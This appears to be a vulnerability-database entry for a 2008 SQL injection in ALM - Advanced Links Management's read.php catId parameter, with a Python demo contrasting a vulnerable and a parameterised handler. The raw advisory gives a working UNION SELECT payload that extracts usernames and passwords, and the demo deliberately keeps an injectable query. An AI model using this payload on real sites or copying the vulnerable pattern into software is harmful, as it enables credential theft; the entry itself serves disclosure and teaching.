Vendor: ALM - Advanced Links Management
By: His0k4
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: ALM - Advanced Links Management
Affected Version From: 1.5.2002
Affected Version To: 1.5.2002
Patch Exists: YES
Related CWE: N/A
CPE: a:easy-script:alm
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2008

ALM – Advanced Links Management remote SQL injection exploit

A remote SQL injection vulnerability exists in ALM - Advanced Links Management v1.5.2. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable script read.php, whose catId parameter is placed into a database query without validation or parameterization. The injected SQL can be used to extract sensitive information from the database, modify data, or execute system commands.
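The following Python example is added here to illustrate the defect class behind this entry; it is not code from the ALM script (which is PHP) or from the original advisory. It stands in an in-memory SQLite database for the script's MySQL backend: the table name "login" and its username/password columns come from the advisory's proof-of-concept, while the "categories" table and its rows are constructed. The injected value is the advisory's, with SQLite's || operator replacing MySQL's concat(). The vulnerable handler interpolates catId into the query text; the hardened handler validates it as a positive integer and binds it as a parameter, which is the fix an upgrade of the script would be expected to apply.

```python
import sqlite3


def build_db():
    """Constructed sample database standing in for the script's MySQL schema."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE login (username TEXT, password TEXT);
        INSERT INTO categories VALUES (1, 'Search engines'), (2, 'Forums');
        INSERT INTO login VALUES ('admin', 'constructed-hash');
        """
    )
    return con


def read_category_vulnerable(con, cat_id):
    """Vulnerable pattern: catId is pasted straight into the SQL text,
    so a UNION in the parameter becomes part of the query."""
    sql = f"SELECT id, name FROM categories WHERE id = {cat_id}"
    return con.execute(sql).fetchall()


def read_category_hardened(con, cat_id):
    """Hardened pattern: reject anything that is not a positive integer,
    then pass the value as a bound parameter rather than as SQL text."""
    try:
        cat_id_int = int(str(cat_id).strip())
    except ValueError:
        raise ValueError("catId must be an integer") from None
    if cat_id_int < 1:
        raise ValueError("catId out of range")
    sql = "SELECT id, name FROM categories WHERE id = ?"
    return con.execute(sql, (cat_id_int,)).fetchall()


# The advisory's injected value, with || standing in for MySQL concat()
# and ':' for 0x3a (constructed adaptation for SQLite).
PAYLOAD = "-1 UNION SELECT 1, username || ':' || password FROM login--"


def demo():
    """Run the same attacker-controlled value through both handlers.
    Returns (rows leaked by the vulnerable handler, whether the hardened
    handler rejected the value)."""
    con = build_db()
    leaked = read_category_vulnerable(con, PAYLOAD)
    try:
        read_category_hardened(con, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    rows, rejected = demo()
    print("vulnerable handler returned:", rows)
    print("hardened handler rejected the value:", rejected)
```

Running the module shows the vulnerable handler returning the credential row from the unrelated login table, while the hardened handler never reaches the database because the value fails integer validation; even without that check, the bound parameter would be compared as a literal and match nothing.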

Mitigation:

Upgrade to the latest version of ALM - Advanced Links Management

Exploit-DB raw data:

###################################################
[~] ALM - Advanced Links Management remote SQL injection exploit
[~] Script download : http://www.easy-script.com/scripts-dl/alm_v152.zip
[~] Founder: His0k4 { ALGERIAN HACKER }
[~] Greetz : All friends & muslims HaCkErS...
[~] Contact: His0k4.hlm[at]gmail.com
[~] P.O.C :
---------------------
http://localhost/[script_path]/read.php?catId={SQL}
[~] Example :
http://localhost/[script_path]/read.php?catId=-1 UNION SELECT 1,concat(username,0x3a,password) FROM login--
---------------------
[~] Note:
    Admin login:  http://localhost/[script_path]/admin
---------------------
###############################################

# milw0rm.com [2008-05-10]